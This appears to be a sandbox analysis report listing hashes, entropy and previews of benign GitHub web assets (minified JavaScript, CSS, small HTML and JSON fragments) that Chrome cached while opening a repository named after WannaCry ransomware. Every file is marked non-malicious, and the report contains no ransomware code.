                                                                                      Preview:. . <div id="repository-details-container" data-turbo-replace>. <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;">. . .. <li>. <a href="/login?return_to=%2Fchronosmiki%2FRANSOMWARE-WANNACRY-2.0" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;notification subscription menu watch&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;LOG_IN&quot;,&quot;originating_url&quot;:&quot;https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="f5ca4f35c2d551427ff8382febcd8ab78c27677b1f372e7f4c8ddaaf4b4adba7" aria-label="You must be signed in to change notification settings" data-view-component="true" class="tooltipped tooltipped-s btn-sm btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class=
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (16343)
                                                                                      Category:dropped
                                                                                      Size (bytes):16485
                                                                                      Entropy (8bit):5.303812957210801
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:6Yf8O/SCIXdN0Vo7UwUbnBNcki+pAW/qvZ:/klMHwUg
                                                                                      MD5:AD270C9D4561D48DC1DB94E233F25626
                                                                                      SHA1:6D2CDEF88DD0D45136FDD7926181C12E9603C119
                                                                                      SHA-256:F8729498EBD61C2810C764DC5464E506056AD1453559D10CDA803B4482395375
                                                                                      SHA-512:FD8396D2490B1F924B73ED7C78FC441118938FF4AD5DC077B0C3C68EA690E85F31E34085B41474B92DDF5AE4E80F7691CF4F98FC6E7753ED733469BFF0076DF5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-e50ab6"],{95475:(e,t,n)=>{function i(e){let t=e.match(/#?(?:L)(\d+)((?:C)(\d+))?/g);if(t){if(1===t.length){let e=a(t[0]);if(!e)return;return Object.freeze({start:e,end:e})}if(2!==t.length)return;{let e=a(t[0]),n=a(t[1]);if(!e||!n)return;return c(Object.freeze({start:e,end:n}))}}}function r(e){let{start:t,end:n}=c(e);return null!=t.column&&null!=n.column?`L${t.line}C${t.column}-L${n.line}C${n.column}`:null!=t.column?`L${t.line}C${t.column}-L${n.line}`:null!=n.column?`L${t.line}-L${n.line}C${n.column}`:t.line===n.line?`L${t.line}`:`L${t.line}-L${n.line}`}function s(e){let t=i(e),n=function(e){let t=e.length<5e3&&e.match(/(file-.+?-)L\d+?/i);return t?t[1]:""}(e);return{blobRange:t,anchorPrefix:n}}function l({anchorPrefix:e,blobRange:t}){return t?`#${e}${r(t)}`:"#"}function a(e){let t=e.match(/L(\d+)/),n=e.match(/C(\d+)/);r
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):67318
                                                                                      Entropy (8bit):5.224787617649299
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:0VXgrKtRd8qiUv5RVmfbJVAkh4521ZVsDQ+n9HpVCMZvqb5LmFw+jrOHrFb6fmsD:B21v56oKLPpRZ2onL4
                                                                                      MD5:F4A8B20CC0ECD884A13E203A6AFB7FB5
                                                                                      SHA1:72077C05F99722D29EDC574ED99C52BD13B6870E
                                                                                      SHA-256:A15422072AE6978BC931AF72ADFC88291A97D32D3E4CF5D5A211B0F497DFA5A5
                                                                                      SHA-512:6A44576977D005B11540F175A92047A65FFC1F75CD7CF8921C6CECF0C849EFD1A4845C30162E748909683260DD1AF77EE0EA80C87EADA5BC3B754E6256BC0AA6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["repositories","ui_packages_soft-navigate_soft-navigate_ts"],{73893:(e,t,r)=>{let n,o;r.d(t,{lO:()=>f,qA:()=>u,y0:()=>s});let i=[],a=0;function s(){return n}function l(){try{return Math.min(Math.max(0,history.length)||0,9007199254740991)}catch(e){return 0}}function c(e){n=e;let t=location.href;i[l()-1+a]={url:t,state:n},i.length=l(),window.dispatchEvent(new CustomEvent("statechange",{bubbles:!1,cancelable:!1}))}function d(){return new Date().getTime()}function u(e,t,r){a=0;let n={_id:d(),...e};history.pushState(n,t,r),c(n)}function f(e,t,r){let o={...n,...e};history.replaceState(o,t,r),c(o)}n=function(){let e={_id:new Date().getTime(),...history.state};return c(e),e}(),window.addEventListener("popstate",function(e){let t=e.state;if(!t||!t._id&&!t.turbo?.restorationIdentifier)return;let r=t.turbo?.restorationIdentifier,n=i[l()-1+a-1]?.state?.turbo?.restorationIdentifier;n===r?a--:a++,c(t)},!0),window.addEventListe
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (28879)
                                                                                      Category:dropped
                                                                                      Size (bytes):30314
                                                                                      Entropy (8bit):5.399749893125249
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:052NUsW6G5fKE8lyrFW3vEE1Li7e1ljOL3OD8868fxLKyfBqzaeD0uE40/8blPcH:tjG5yFlyrFUlirrQuRGG94McQZ2tF7
                                                                                      MD5:C13C934FA35DEABDEC29809AF2B05328
                                                                                      SHA1:503F0A4C16C9DACCD38BFE8A9D911F5E744FCC64
                                                                                      SHA-256:E0EF430ED99F8903B3B589BAAEE9B93B209377D80DBAB6363990D53D51854168
                                                                                      SHA-512:20A011926F270D80703CB7B18ECBA61BE67CB7AE72360E0E47C69C937E9FA540D18F0BA2B03B5D0676DD27F8955FEA6372CFFF0CE216623A173A5068CA8A405D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["keyboard-shortcuts-dialog"],{40578:(e,t,r)=>{let n;function a(){if(!n)throw Error("Client env was requested before it was loaded. This likely means you are attempting to use client env at the module level in SSR, which is not supported. Please move your client env usage into a function.");return n}function i(){return n?.locale??"en-US"}r.d(t,{Kd:()=>i,dU:()=>a}),function(){if("undefined"!=typeof document){let e=document.getElementById("client-env");if(e)try{n=JSON.parse(e.textContent||"")}catch(e){console.error("Error parsing client-env",e)}}}()},87274:(e,t,r)=>{r.d(t,{C:()=>i,x:()=>a});var n=r(71207);let a=n.n4?.readyState==="interactive"||n.n4?.readyState==="complete"?Promise.resolve():new Promise(e=>{n.n4?.addEventListener("DOMContentLoaded",()=>{e()})}),i=n.n4?.readyState==="complete"?Promise.resolve():new Promise(e=>{n.iG?.addEventListener("load",e)})},18515:(e,t,r)=>{r.d(t,{$:()=>d,c:()=>l});var n=r(15205)
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (25899)
                                                                                      Category:dropped
                                                                                      Size (bytes):57566
                                                                                      Entropy (8bit):5.421575894646722
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:7K3mIKj7KSd0j+kreSbrPEDARRakjke1p:+mzGSd0HBKep
                                                                                      MD5:338BE20BBC0D886F94B296C765DE771A
                                                                                      SHA1:FC46864542CEB31151342A4CE3CB39C8E15C56E3
                                                                                      SHA-256:749A3AEC097345B111E89A0FDDF5DD88EB6BAA94065897C1F880B167430199BD
                                                                                      SHA-512:4DDD2C275F258CFEC87D23D06A56236510F9979C253ED8AC581036814FE7D528D08A6690A1574184FCFB5D31EEDBDA078FCE9A61052C2BA159E88832DCA22EFA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["repos-overview"],{31074:(e,t,r)=>{var n,s=r(74898),i=r(85893),o=r(67294),a=r(47658),l=r(52674),c=r(12008),d=r(51952),u=r(56830),h=r(15062),p=r(18602),m=r(211),f=r(86525),x=r(81700),y=r(37589),v=r(55822),b=r(12484),g=r(34734),w=r(47357),j=r(70668),_=r(17191),S=r(22326),E=r(96463),k=r(77461),C=r(75299),R=r(85193),T=r(87623),Z=r(85529),N=r(42483),I=r(88216),P=r(45677),L=r(50919),A=r(52516),D=r(98833),O=r(77149),B=r(14136),$=r(7949),U=r(56363),M=r(20679),F=r(97011),G=r(73290),z=r(31147),H=r(17791),W=r(65379),Q=r(17580),Y=r(51461),q=r(74121),V=r(75308);let J=(0,U.Z)("localStorage");function K(e){let t="code-button-default-tab",[r,n]=(0,o.useState)("local"),[s,a]=(0,o.useState)(""),[l,c]=(0,o.useState)(!1),[d,u]=(0,o.useState)({}),[h,p]=(0,o.useState)(""),{isLoggedIn:m,refName:f,repoId:x,repoOwner:y,repoName:v,payload:b}=e,{codespacesEnabled:g,hasAccessToCodespaces:w,repoPolicyInfo:j,contactPath:_,currentUserIsEnterpr
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):119130
                                                                                      Entropy (8bit):5.023514948093931
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:vKIls+7IWBOZzGyD6DA/k/c0ESH4nnsf7GV+MyUCkaIIG2AiW0wogXrqvMt2XVXu:nMZPNk7GV5IXby6KERrMyEQtc9
                                                                                      MD5:08A9321C7A5E7988158D86B61B4A2A80
                                                                                      SHA1:890C5A4A3D8AF53B5ECAF2EFA13B345CA3233A77
                                                                                      SHA-256:08754F9ACB163A564C71C8C08B9CF03E9912C486EBFF08F7EA376B74742EB361
                                                                                      SHA-512:19C85BE4AF9C4EB8E532503EF3730D233318504D8B1F5F5B535BBD3B067E5D072072500BEE3B65B1B91B0CA7414F4F21FA6E79365CF19EA07A98E527E1C00B3F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.min-height-full{min-height:100vh !important}.hanging-icon-list{list-style-type:none}.hanging-icon-list li{padding-left:24px;margin:8px 0;font-size:14px}.hanging-icon-list .octicon{float:left;margin-top:4px;margin-left:-24px;color:var(--fgColor-muted, var(--color-fg-muted))}.hanging-icon-list .octicon-check{color:var(--fgColor-success, var(--color-success-fg))}.hanging-icon-list .octicon-x{color:var(--fgColor-danger, var(--color-danger-fg))}.integrations-install-target .select-menu{vertical-align:middle}.integrations-install-target input[type=radio]{margin-right:8px}.integrations-install-target .flash{background-color:transparent}.integrations-install-target .flash-error{background-color:transparent;border:0}.integrations-install-target .octicon-lock,.integrations-install-target .octicon-repo,.integrations-install-target .octicon-repo-forked{margin-right:4px}.integrations-install-target .octicon-lock{color:var(--fgColor-attention, var(--color-attention-fg))}.integrations-install-target
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.75
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HqSAhQkYn:KzhQRn
                                                                                      MD5:F7C9BD6DAA8ED02A0EDA7D9410EC38D2
                                                                                      SHA1:5FE1926330DF187416478B231521353D9053F35D
                                                                                      SHA-256:5FA699CF5E849ABBD04ED4D8A6985682D4FC74928704E942D1188B6010A3C4C7
                                                                                      SHA-512:8AAEFC331DB875CC3EAE92E992AE73F01227D4683FBC528A1687730D6190E809B13BB16D6EC9349C2F1820D126C094947A23A0528709141C3C9012E6C5EE647C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:CgkKBw3UweD+GgA=
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):725338
                                                                                      Entropy (8bit):5.319304120089708
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:nZIUPVCjbbN0Zij9V3Z0aZ6tCKUIKXljLAvFnPehOpz473Cx2FZVt8nl0ePpg4i7:ZIBOxPcyEXIxToksLqSe/0CaKy
                                                                                      MD5:38773EA059EE0C5A7CAAB2655C072890
                                                                                      SHA1:759370E3FF6EFEB95D3FE4054280CDE020D5AE52
                                                                                      SHA-256:DBBC59389F09A65E38D473016EF15DCC006EE70F55018B4360D9E13388284C0C
                                                                                      SHA-512:A58D7C11E858847F872C31F654006ACFCAF90363F8C72AE8DFC63A5541D1692A291DCBD380AEE50F26C919C2A290D972772AC9400019D5910B0F107623BEA81B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c"],{85529:(r,e,a)=>{"use strict";a.r(e),a.d(e,{AccessibilityIcon:()=>n,AccessibilityInsetIcon:()=>l,AlertFillIcon:()=>d,AlertIcon:()=>i,AppsIcon:()=>s,ArchiveIcon:()=>h,ArrowBothIcon:()=>v,ArrowDownIcon:()=>g,ArrowDownLeftIcon:()=>b,ArrowDownRightIcon:()=>u,ArrowLeftIcon:()=>f,ArrowRightIcon:()=>m,ArrowSwitchIcon:()=>p,ArrowUpIcon:()=>C,ArrowUpLeftIcon:()=>w,ArrowUpRightIcon:()=>k,BeakerIcon:()=>y,BellFillIcon:()=>Z,BellIcon:()=>x,BellSlashIcon:()=>M,BlockedIcon:()=>A,BoldIcon:()=>E,BookIcon:()=>B,BookmarkFillIcon:()=>H,BookmarkIcon:()=>I,BookmarkSlashFillIcon:()=>T,BookmarkSlashIcon:()=>V,BriefcaseIcon:()=>L,BroadcastIcon:()=>S,BrowserIcon:()=>F,BugIcon:()=>R,CacheIcon:()=>D,CalendarIcon:()=>P,CheckCircleFillIcon:()=>N,CheckCircleIcon:()=>O,CheckIcon:()=>j,CheckboxIcon:()=>U,ChecklistIcon:()=>K,ChevronDownIcon:()=>W,ChevronLe
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):85
                                                                                      Entropy (8bit):4.438531601165092
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:8FkLKuClEcR7mf8gVP/vLKuC11EmSiL:EuCxNmZJ/2uC1P
                                                                                      MD5:61D58C3387D3331CD7AAB44AD2C3AE1F
                                                                                      SHA1:9EF864ACB849E594A947879DD5765F70601E8EEC
                                                                                      SHA-256:8902C7088699D5C25402933819980CD97BCB2B2D05D53A3F8E7A72F2DAAD5D0B
                                                                                      SHA-512:C3F08724D6933B6AF7402FAA9FD675347A6E00CD7F41EF56AF9A9DAEF3E77779DA8097738C8DFEF9C5623279C1D524E737455329D8CAD248484083C7C2F591CE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<strong class="color-fg-default">0</strong>.<span class="color-fg-muted">Tags</span>.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11216)
                                                                                      Category:dropped
                                                                                      Size (bytes):11358
                                                                                      Entropy (8bit):5.384187680818731
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:o8rCyGN+c9ySMfltn5ZqtqVXjdDRT8mOEYNQCyVIBQKBiLSMEb4tYqx/g1sIq+xX:socb+niEd8mntYM/mqONvtB5
                                                                                      MD5:E4E3F5F2BD561F558F377C8806895B49
                                                                                      SHA1:1D2E53F62F6755251B8F685CEF3AAC8006412773
                                                                                      SHA-256:690DD89CBE957A5F6CD7A8B92B587A9E5704AB1BDB5FE32B71CD6EDE335C2D61
                                                                                      SHA-512:2969C7508F3A4FAAEA033E274FAA94CB656FB2F5ECC4BCAFC4E19BD3FBA8A42946DE409B610002DA83F1E81A58593AA1686B4607DBF5480BB7AA62C78E048898
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_TabNav_-8321f5"],{74390:(e,r,t)=>{t.d(r,{Z:()=>k});var n=t(67294),a=t(15388),o=t(50919),i=t(42483),l=t(15173),c=t(31171),s=t(42379),u=t(35048);let d=()=>null;function f(e){var r;return e.tabIndex>=0&&!e.disabled&&!(r=e).hidden&&(!r.type||"hidden"!==r.type)&&(r.offsetWidth>0||r.offsetHeight>0)}var v=t(97011),p=t(85529);function b(){return(b=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e}).apply(this,arguments)}let m=()=>null,h=a.ZP.div.withConfig({displayName:"Dialog__DialogBase",componentId:"sc-13rdxb7-0"})(["box-shadow:",";border-radius:",";position:fixed;top:0;left:50%;transform:translateX(-50%);max-height:80vh;z-index:999;margin:10vh auto;background-color:",";width:",";outline:none;@media scre
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (18418)
                                                                                      Category:dropped
                                                                                      Size (bytes):18560
                                                                                      Entropy (8bit):5.133839301985463
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:6jHPp9mN2rQTLmJJKkZhU5JTTdk1d+C31Vj+BeoSaUu2QDF3AI9sK8lSno7dAfH4:6LvdQTZkuS1d+C31Vj+soSaeQDF3RB7s
                                                                                      MD5:21C56E08D54CACD285B71CB9822E4510
                                                                                      SHA1:F1E2472C4F75565E065A222D4D8230E4C3EAF2E1
                                                                                      SHA-256:FCDF8D456AADE47C524428BD32301C8E07D3535D2084E0CB0BD13B67FA5E6430
                                                                                      SHA-512:654130B7CDE50138E63B58F5339E703D43C6719A508B45A0A168777CB1AB5F204D5431D854BDCA627DA0EF3F39CB9D699B3A7B7F8CBA0442EA2F45D9D19FFCF4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4"],{13002:(t,e,n)=>{n.d(e,{Z:()=>a});let FilterInputElement=class FilterInputElement extends HTMLElement{constructor(){super(),this.currentQuery=null,this.filter=null,this.debounceInputChange=function(t){let e;return function(){clearTimeout(e),e=setTimeout(()=>{clearTimeout(e),t()},300)}}(()=>r(this,!0)),this.boundFilterResults=()=>{r(this,!1)}}static get observedAttributes(){return["aria-owns"]}attributeChangedCallback(t,e){e&&"aria-owns"===t&&r(this,!1)}connectedCallback(){let t=this.input;t&&(t.setAttribute("autocomplete","off"),t.setAttribute("spellcheck","false"),t.addEventListener("focus",this.boundFilterResults),t.addEventListener("change",this.boundFilterResults),t.addEventListener("input",this.debounceInputChange))}disconnectedCallback(){let t=this.input;t&&(t.removeEventListener("focus",this.boundFilterR
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):239
                                                                                      Entropy (8bit):4.8182914609695064
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YW4IFt+g4Yabke3gmQ81tGD5s/0AMDe8YvELX/V:YW4IF4nZAeQmXCsSDe8YvuN
                                                                                      MD5:BB7069AC14A746FC1B2599598D6A4E3D
                                                                                      SHA1:D35B19027CAF859A0AB2FA63F9F71502F7C2C051
                                                                                      SHA-256:3CA1CB8AC06E96DA0082E70BD7B7C4081D09CA1664B41200AF91E04F157366C9
                                                                                      SHA-512:9857285635411A6A8DA9F1DD4B06462B14417E58218326CDBE1AB5CC9D1691C6D9FDF468DE878AE7EDDBAE37863C107A70915DD927A7BB2871CD29105243AA45
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"showLicenseMeta":false,"license":null,"newIssuePath":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/issues/new","newDiscussionPath":null,"codeownerInfo":{"codeownerPath":null,"ownedByCurrentUser":null,"ownersForFile":null,"ruleForPathLine":null}}
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11591)
                                                                                      Category:dropped
                                                                                      Size (bytes):11696
                                                                                      Entropy (8bit):5.091716162093441
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:KjEFGl/ybxKp3nnPlY19e22DA/HDZRM+GvSU7x1jr0T5hi+Vqe9:9FU/wKp3nPlY19erDAPFRM+Ix9UQe9
                                                                                      MD5:DA04614AE380B68C111984F401413FC7
                                                                                      SHA1:7CA0DC023CA0B1654D7C8630B8A05534E156D03D
                                                                                      SHA-256:85FA448F4D60BE73DE2F42A83937523B7B751A4523B809FE9E3EDB404E00B835
                                                                                      SHA-512:8A621DF59E80E8851A8CF3DB03462095E8BBA43A860B1018DC66780448E82D19871BE99AAB995FA57025DB8B7F8E975EB0595FE2C59CA23D984B4D21D5031AAA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_text-expander-element_dist_index_js"],{33491:()=>{let Combobox=class Combobox{constructor(t,i,{tabInsertsSuggestions:n,defaultFirstOption:s,scrollIntoViewOptions:o}={}){this.input=t,this.list=i,this.tabInsertsSuggestions=null==n||n,this.defaultFirstOption=null!=s&&s,this.scrollIntoViewOptions=null!=o?o:{block:"nearest",inline:"nearest"},this.isComposing=!1,i.id||(i.id=`combobox-${Math.random().toString().slice(2,6)}`),this.ctrlBindings=!!navigator.userAgent.match(/Macintosh/),this.keyboardEventHandler=t=>(function(t,i){if(!t.shiftKey&&!t.metaKey&&!t.altKey&&(i.ctrlBindings||!t.ctrlKey)&&!i.isComposing)switch(t.key){case"Enter":e(i.input,i.list)&&t.preventDefault();break;case"Tab":i.tabInsertsSuggestions&&e(i.input,i.list)&&t.preventDefault();break;case"Escape":i.clearSelection();break;case"ArrowDown":i.navigate(1),t.preventDefault();break;case"ArrowUp":i.navigate(-1),t.preventDefault(
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (9457)
                                                                                      Category:dropped
                                                                                      Size (bytes):15313
                                                                                      Entropy (8bit):5.329671387695942
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:olNUCTYz60UC6SAhCbD0BBAhwCWGGKLCFlSohw5g1miOCarGHV3EoLX30MQ8CHvU:olNBY/sSA86mrBS1mDfbFqVa7lM
                                                                                      MD5:22FD10F65B7F99ECEC1E79E08308F31D
                                                                                      SHA1:EDE17892E18C0B5E69F4B1ABA3C8F5FB91E8A529
                                                                                      SHA-256:7FD362FD2F0FE0ED5D21A028468797A3D84298BFCE3B482A8A0902AFD2E61730
                                                                                      SHA-512:949A0431D8C0416EE19FD9781C6A45FD28FA90332DA907755C35554F2131477B8FDFDE18ACA6A1C792FBDF15E8B9D6E8C4F654BA0519B29F9206F5C578AD4CA4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-4e97c6"],{26012:(e,t,r)=>{r.d(t,{Z:()=>b,e:()=>g});var n=r(67294),o=r(15388),l=r(42379),a=r(15173),i=r(11791),s=r(20917),d=r(7261),c=r(9996),p=r.n(c);function u(){return(u=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}let g=20,m=o.ZP.img.attrs(e=>({height:e.size,width:e.size})).withConfig({displayName:"Avatar__StyledAvatar",componentId:"sc-2lv0r8-0"})(["display:inline-block;overflow:hidden;line-height:",";vertical-align:middle;border-radius:",";box-shadow:0 0 0 1px ",";height:var(--avatar-size);width:var(--avatar-size);",""],(0,l.U2)("lineHeights.condensedUltra"),e=>e.square?"clamp(4px, var(--avatar-size) - 24px, 6px)":"50%",(0,l.U2)("colors.avatar.border"),a.Z),b
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:3:3
                                                                                      MD5:E1C06D85AE7B8B032BEF47E42E4C08F9
                                                                                      SHA1:71853C6197A6A7F222DB0F1978C7CB232B87C5EE
                                                                                      SHA-256:75A11DA44C802486BC6F65640AA48A730F0F684C5C07A42BA3CD1735EB3FB070
                                                                                      SHA-512:016BA8C4CFDE65AF99CB5FA8B8A37E2EB73F481B3AE34991666DF2E04FEB6C038666EBD1EC2B6F623967756033C702DDE5F423F7D47AB6ED1827FF53783731F7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (4040)
                                                                                      Category:dropped
                                                                                      Size (bytes):10186
                                                                                      Entropy (8bit):5.315954641074853
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ktqMXxMuVqF6h9GkNGLFyXuCYSgtoJ2wlq:036uUW97NSAuCYzoMD
                                                                                      MD5:EB1CBDA567B8DBF7515FC0E9BA164EE6
                                                                                      SHA1:460137A3538CB53D0697A19BC4DF8A7ED15FBFE1
                                                                                      SHA-256:3313156518B58111228EA7E2BAA769BB93DA018E13C544F9FBF1C1096706ADE5
                                                                                      SHA-512:F5230254D82B1FBF1BC6A5C2BF075F3F4378885237E414D55C17EEEF9621B86CCEE72A0405DEA9C25F7B5B385508DC53F8DCA2AB718A8E025795001EE38372AC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_components_search_custom-scopes-element_ts"],{26150:(e,t,o)=>{o.r(t),o.d(t,{CustomScopesElement:()=>T});var s,a,i,n,c,r,l,d,u=o(76006),h=o(55399);function p(e,t){if(t.has(e))throw TypeError("Cannot initialize the same private elements twice on an object")}function m(e,t,o){if(!t.has(e))throw TypeError("attempted to "+o+" private field on non-instance");return t.get(e)}function f(e,t){var o=m(e,t,"get");return o.get?o.get.call(e):o.value}function y(e,t,o){p(e,t),t.set(e,o)}function S(e,t,o){var s=m(e,t,"set");return!function(e,t,o){if(t.set)t.set.call(e,o);else{if(!t.writable)throw TypeError("attempted to set read only private field");t.value=o}}(e,s,o),o}function g(e,t,o){if(!t.has(e))throw TypeError("attempted to get private field on non-instance");return o}function v(e,t){p(e,t),t.add(e)}function b(e,t,o,s){var a,i=arguments.length,n=i<3?t:null===s?s=Object.getOwnPropertyDescriptor(t,o):s;if("object"==type
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):85
                                                                                      Entropy (8bit):4.438531601165092
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:8FkLKuClEcR7mf8gVP/vLKuC11EmSiL:EuCxNmZJ/2uC1P
                                                                                      MD5:61D58C3387D3331CD7AAB44AD2C3AE1F
                                                                                      SHA1:9EF864ACB849E594A947879DD5765F70601E8EEC
                                                                                      SHA-256:8902C7088699D5C25402933819980CD97BCB2B2D05D53A3F8E7A72F2DAAD5D0B
                                                                                      SHA-512:C3F08724D6933B6AF7402FAA9FD675347A6E00CD7F41EF56AF9A9DAEF3E77779DA8097738C8DFEF9C5623279C1D524E737455329D8CAD248484083C7C2F591CE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<strong class="color-fg-default">0</strong>.<span class="color-fg-muted">Tags</span>.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (13393)
                                                                                      Category:dropped
                                                                                      Size (bytes):13535
                                                                                      Entropy (8bit):5.074110399291271
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:V0AAAjjGX0BwT7lw8BwNXxTt/tj1xt7FBxQnR:U/Z7e8BwNXRt/thxt+R
                                                                                      MD5:04F1546514C5EEC6A28B777B1BAE7288
                                                                                      SHA1:BB29D0448985672691F54DB4B8CCAE86E8B13536
                                                                                      SHA-256:6E36DD93EAC542396395339C6EB0D1118EE418E37E9076FD819BB50150EDE956
                                                                                      SHA-512:5A0E291A0298EBA972EEC6EA8B7F818B7C8F1C821198F09983DC1D029E70A35DAB2E51A0860D5DC359C6BEFDD7EEDA4737E5BB0EF9EAC504CBF61C9362B93748
                                                                                      Malicious:false
                                                                                      Reputation:low
